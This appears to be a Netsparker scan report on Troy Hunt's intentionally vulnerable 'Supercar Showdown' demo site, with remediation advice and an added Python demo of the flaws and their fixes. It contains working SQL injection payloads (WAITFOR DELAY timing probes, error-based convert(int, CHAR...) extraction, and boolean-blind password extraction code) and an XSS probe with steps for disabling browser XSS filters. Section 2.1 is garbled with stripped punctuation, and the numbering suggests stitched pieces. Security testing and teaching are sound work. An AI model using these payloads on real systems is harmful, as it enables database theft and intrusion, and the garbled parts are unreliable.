GET /Make/2?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:03:34 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>McLarens - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…

1.5 /api/vote  CONFIRMED
http://hackyourselffirst.troyhunt.com/api/vote
Parameters:
Parameter   Type  Value
userId      POST  1
supercarId  POST  3
comments    POST  ') WAITFOR DELAY '0:0:25'--

Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 68
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%27)+WAITFOR+DELAY+%270%3a0%3a25%27--

Response:
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:21:22 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1
CRITICAL: 5 total, 5 confirmed

2 SQL Injection
Netsparker identified an SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Netsparker confirmed the vulnerability by executing a test SQL query on the backend database.
Impact: Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following types of attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system
Actions to Take: 1. See the remedy for solution. 2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.
Remedy: A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation. Note that the orderby/orderBy parameters in the evidence land in an ORDER BY clause, and a column name cannot be bound as a query parameter: for those, map the user-supplied value onto an allow-list of known column names (and the sort direction onto ASC/DESC) before building the query. The comments value sent to /api/vote is ordinary data and should be bound as a parameter.
Required Skills for Successful Exploitation: There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.
External References: OWASP SQL injection; SQL injection Cheat sheet
Remedy References: MSDN - Protect From SQL injection in ASP.NET
Classification: OWASP 2010-A1, OWASP 2013-A1, PCI V2.0-6.5.1, PCI V3.0-6.5.1, CWE-89, CAPEC-66, WASC-19
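The two query shapes behind the confirmed findings, each beside its fixed form, as an added example that is not part of the Netsparker report or of the Supercar Showdown code. It runs on an in-memory SQLite database; the schema (Supercar, UserProfile, Vote and their columns) is an assumption made for the demo, not the application's real one, and SQLite stands in for SQL Server, so the T-SQL specific probes in the evidence (WAITFOR, convert(int, ...)) are replaced by portable equivalents. It shows the ORDER BY injection being used for boolean inference, which is what makes "possible SQL injection on orderby" a data-extraction primitive, and the comments injection smuggling a second row into the INSERT; the fixed versions reject the sort key that is not on the allow-list and store the comment payload as inert text.

```python
import sqlite3

# Added example, not part of the Netsparker report or of the scanned
# application. Schema and data are constructed for the demo.
ALLOWED_ORDER_COLUMNS = {"name", "votes"}   # the only sort keys the page offers


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Supercar (Id INTEGER, Name TEXT, Votes INTEGER);
        CREATE TABLE UserProfile (Id INTEGER, Email TEXT, Password TEXT);
        CREATE TABLE Vote (UserId INTEGER, SupercarId INTEGER, Comments TEXT);
        INSERT INTO Supercar VALUES (1, 'Nissan GT-R', 5), (2, 'Pagani Zonda', 9), (3, 'McLaren F1', 7);
        INSERT INTO UserProfile VALUES (1, 'admin@example.com', 's3cret');
    """)
    return conn


def list_makes_vulnerable(conn, orderby):
    """The 'before' of 2.2: user input concatenated straight into ORDER BY."""
    return [row[0] for row in conn.execute("SELECT Name FROM Supercar ORDER BY " + orderby)]


def is_allowed_orderby(orderby):
    return orderby.lower() in ALLOWED_ORDER_COLUMNS


def list_makes_safe(conn, orderby, asc=True):
    """The fix for an identifier position: a column name cannot be a bound
    parameter, so the value is mapped onto an allow-list and the direction
    onto a fixed pair; anything else is rejected before any SQL is built."""
    if not is_allowed_orderby(orderby):
        raise ValueError(f"orderby not allowed: {orderby!r}")
    direction = "ASC" if asc else "DESC"
    sql = f"SELECT Name FROM Supercar ORDER BY {orderby.lower()} {direction}"
    return [row[0] for row in conn.execute(sql)]


def infer_password_char(conn, position, guess):
    """Boolean-blind inference through the vulnerable ORDER BY: the sort key
    flips between Votes and Name depending on a condition about the admin
    password, so the first row returned answers one yes/no question."""
    payload = (f"CASE WHEN (SELECT substr(Password, {position}, 1) FROM UserProfile "
               f"WHERE Id = 1) = '{guess}' THEN Votes ELSE Name END")
    return list_makes_vulnerable(conn, payload)[0] == "Nissan GT-R"   # lowest Votes


def add_vote_vulnerable(conn, user_id, supercar_id, comments):
    """The 'before' of 2.1: a string-built INSERT."""
    conn.execute("INSERT INTO Vote VALUES (%d, %d, '%s')" % (user_id, supercar_id, comments))


def add_vote_safe(conn, user_id, supercar_id, comments):
    """The fix for a data position: a bound parameter, never part of the SQL."""
    conn.execute("INSERT INTO Vote (UserId, SupercarId, Comments) VALUES (?, ?, ?)",
                 (user_id, supercar_id, comments))


def stored_comments(conn):
    return [row[0] for row in conn.execute("SELECT Comments FROM Vote ORDER BY rowid")]


# A comments value that closes the literal, appends a second row carrying the
# admin password, and comments out the remainder of the original statement.
COMMENT_PAYLOAD = "x'), (1, 3, (SELECT Password FROM UserProfile WHERE Id = 1)) --"


def demo_comment_injection():
    """Run both inserts with COMMENT_PAYLOAD on a fresh database and return
    what ended up in the Comments column."""
    conn = setup_db()
    add_vote_vulnerable(conn, 1, 3, COMMENT_PAYLOAD)
    add_vote_safe(conn, 1, 3, COMMENT_PAYLOAD)
    return stored_comments(conn)


if __name__ == "__main__":
    db = setup_db()
    print(infer_password_char(db, 1, "s"), infer_password_char(db, 1, "x"))
    print(demo_comment_injection())
```

The vulnerable insert leaves three rows: "x", the admin's password as a comment any visitor can read, and the literal payload stored by the safe insert. The safe sort refuses the report's probe ("1 WAITFOR DELAY '0:0:25'--") before touching the database, which is the behaviour to aim for on /Make/{id} and /Supercar/Leaderboard.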
21 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101) C
Extracted Datamicrosoft sql azure (rtm) - 110922217 ntaug 20 2014 223756 ntcopyright (c) microsoft corporationn
10 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 209Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=272b+(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)+2b27
ResponsehellipPNETContent-Length 2867Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageConversion failed when converting the varchar value _2dilemma to data typeintExceptionTypeSystemDataSqlClientSqlExceptionStackTrace at SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnectionAction`1 wraphellip
2.2 /SupercarLeaderboard CONFIRMED http://hackyourselffirst.troyhunt.com/SupercarLeaderboard?orderBy=(select+convert(int%2cCHAR(95)%2b
Parameters:
Parameter | Type | Value
orderBy | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
asc | GET | false
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /SupercarLeaderboard?orderBy=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)&asc=false HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://hackyourselffirst.troyhunt.com/SupercarLeaderboard
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14292
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<meta name="viewport" content="width=device-width" />
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc">
<tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body>
</html>
<!--
[SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.3 /Make/2 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters:
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<meta name="viewport" content="width=device-width" />
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc">
<tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body>
</html>
<!--
[SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.4 /Make/3 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters:
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<meta name="viewport" content="width=device-width" />
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc">
<tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body>
</html>
<!--
[SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.5 /Make/1 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters:
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<meta name="viewport" content="width=device-width" />
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc">
<tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body>
</html>
<!--
[SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
IMPORTANT | 1 TOTAL | 1 CONFIRMED
3. Cross-site Scripting
Netsparker detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of cross-site scripting, including:
- Hijacking users' active sessions
- Mounting phishing attacks
- Intercepting data and performing man-in-the-middle attacks
Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then the output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.
Remedy References: Microsoft Anti-XSS Library, OWASP XSS Prevention Cheat Sheet, OWASP AntiSamy Java
External References: XSS Cheat Sheet, OWASP - Cross-site scripting, XSS Shell, XSS Tunnelling
Proof of Concept Notes
The generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that XSS filtering is a feature that's enabled by default in some modern browsers. It should only be disabled temporarily to test exploits and should be reverted if the browser is actively used for anything other than testing purposes. Even though browsers have certain checks to prevent cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism; therefore a web application should not rely on this kind of client-side browser check.
Chrome
Open a command prompt. Go to the folder where chrome.exe is located. Run the command: chrome.exe --args --disable-xss-auditor
Internet Explorer
Click Tools -> Internet Options and then navigate to the Security tab. Click Custom level and scroll towards the bottom, where you will find that Enable XSS filter is currently Enabled. Set it to Disabled. Click OK. Click Yes to accept the warning, followed by Apply.
Firefox
Go to about:config in the URL address bar. In the search field type urlbar.filter and find browser.urlbar.filter.javascript. Set its value to false by double clicking the row.
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI v2.0-6.5.7, PCI v3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
3.1 /Search CONFIRMED http://hackyourselffirst.troyhunt.com/Search?searchTerm='%2Bnetsparker(9)%2B'
Parameters:
Parameter | Type | Value
searchTerm | GET | '+netsparker(9)+'
Request:
GET /Search?searchTerm='%2Bnetsparker(9)%2B' HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…</section></div></div></div></div></header>
<div class="container"><section>
<h2>You searched for &quot;<span id="searchTerm">'+netsparker(9)+'</span>&quot;</h2>
<p class="alert alert-error">No results found for your search.</p>
